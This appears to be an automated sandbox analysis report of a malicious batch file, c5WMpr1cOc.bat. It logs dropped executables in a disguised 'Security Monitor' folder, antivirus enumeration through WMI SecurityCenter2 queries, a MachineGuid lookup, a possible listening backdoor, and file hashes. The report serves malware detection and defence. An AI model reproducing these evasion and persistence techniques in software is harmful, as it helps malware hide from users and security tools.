Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033CD280 GetLocalTime,

53_2_033CD280

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033F05CC GetVersionExA,GetVersionExA,

53_2_033F05CC

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntivirusProduct

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

67_2_00D252B0

Windows Analysis Report
c5WMpr1cOc.bat

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1523865
Product:	CloudBasic
Start time:	06:09:06
Start date:	02.10.2024
Sample:	c5WMpr1cOc.bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1ff13790ed1131ef710192fd2a2957dd
SHA1:	96871befc62dbb9aca8910e25e3cdfa4f13d0feb
SHA256:	201ba880456a79f7af54cb4aa5e9c008d8a1961e686acbac7b2f1343e697b7a9

Windows Analysis Report c5WMpr1cOc.bat

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
c5WMpr1cOc.bat